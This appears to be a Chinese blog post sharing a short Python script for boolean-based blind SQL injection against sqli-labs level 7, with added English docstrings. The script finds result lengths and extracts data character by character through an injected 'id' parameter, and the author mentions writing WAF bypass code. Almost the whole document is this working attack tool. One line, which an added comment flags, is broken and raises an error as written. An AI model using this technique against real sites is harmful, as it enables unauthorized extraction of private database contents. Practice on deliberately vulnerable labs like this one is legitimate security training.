根据页面的返回内容、参数取 0 以及 SQL 语句中 or 的逻辑，判断写入的 SQL 语句是否为 true。如果有 WAF，还需要在参数处进行修改或写一段绕过代码。下面是网上找的脚本，自己稍微做了点修改（针对 sqli-labs 第 7 关），感觉短小且好用。
import requests
def check_res(res):
    """Return True when the response carries the lab's "true" marker.

    Boolean-based blind injection needs an oracle that separates a true
    condition from a false one; on sqli-labs Less-7 the page text
    "You are in.... Use outfile......" is that marker. Any other body --
    including error pages and WAF block pages -- counts as False, so a
    blocked request is indistinguishable from a false condition here.

    :param res: a requests.Response; only ``.text`` is read
    :return: bool
    """
    if "You are in.... Use outfile......" in res.text:
        return True
    #elif "登录失败" in res.text:
    # return False
    # The commented-out branch above checks a "login failed" marker; it is
    # presumably left over from another target and is unused here.
    else:
        return False
def res_length(exp):
    """Find the length of the result of SQL expression ``exp`` by probing.

    Starting from -1, the oracle is asked ``length((exp))>N`` for
    N = -1, 0, 1, ... until it answers False; the first N for which
    ``length > N`` is false is the length itself. Each step is one HTTP
    request, so a result of length L costs L+2 requests.

    Detection note: across consecutive requests from one session the ``id``
    parameter shows the same ``length((...))>N`` comparison with N increasing
    by one each time, which is the pattern server-side request logging or a
    WAF would flag.

    :param exp: SQL expression to measure; interpolated into the URL as-is
    :return: the length, or -1 when even the first probe (``>-1``, true for
             any non-NULL result) is answered False, i.e. the injection
             point is not behaving as assumed
    """
    length = -1
    sess = requests.session()
    while True:
        sql_exp = "length((%s))>%d" % (exp,length)
        # NOTE(review): the trailing "//..." text on the next line is not a
        # Python comment (Python uses "#"); it parses as a floor-division by an
        # undefined name, so this line raises NameError at runtime as written.
        # Original note (translated): close the id parameter according to the
        # guessed form of the server-side query.
        url = "http://sqli-labs-master/Less-7/?id=0')) or (%s) --+" % (sql_exp)//根据猜测的sql语句进行参数id的闭合
        res = sess.get(url)
        # First False answer ends the search; length is not incremented.
        if not check_res(res):
            break
        length += 1
    return length
def res_result(exp, length):
    """Recover ``length`` characters of the result of ``exp``, one at a time.

    For each 1-based position a binary search over the range 0..127 asks the
    oracle ``ascii(substr((exp),i,1))>mid``. ``left`` holds a value the
    character is taken to exceed (0 is assumed as the floor) and ``right``
    one it does not exceed; once the two are adjacent ``right`` is the
    character. Every probe is one HTTP request, so about 7 requests per
    character.

    :param exp: SQL expression whose string result is wanted
    :param length: number of characters to recover (as returned by
                   res_length; a negative value yields "")
    :return: the recovered string; because the search never goes above 127,
             a byte greater than 127 comes out as chr(127)
    """
    result = ""
    sess = requests.session()
    for i in range(length):
        left = 0
        right = 127
        while True:
            mid = (left+right) // 2
            # Interval collapsed to [left, left+1]: the character is right.
            if mid == left:
                result += chr(right)
                break
            sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
            url = "http://sqli-labs-master/Less-7/?id=0')) or (%s) --+" % (sql_exp)
            res = sess.get(url)
            # True: character is above mid; False (or blocked): at or below.
            if check_res(res):
                left = mid
            else:
                right = mid
    return result
if __name__ == '__main__':
    # Interactive driver: read a SQL expression, measure its result length,
    # then recover the characters. There is no exit condition and
    # KeyboardInterrupt is not caught, so the loop runs until interrupted.
    while True:
        exp = input(">>>请输入SQL语句:")  # prompt reads "enter SQL statement"
        length = res_length(exp)
        print("[+]length :%d" % (length))
        # A length of -1 (first probe answered False) makes range() empty,
        # so result is printed as an empty string.
        result = res_result(exp, length)
        print("[+]result:%s" % (result))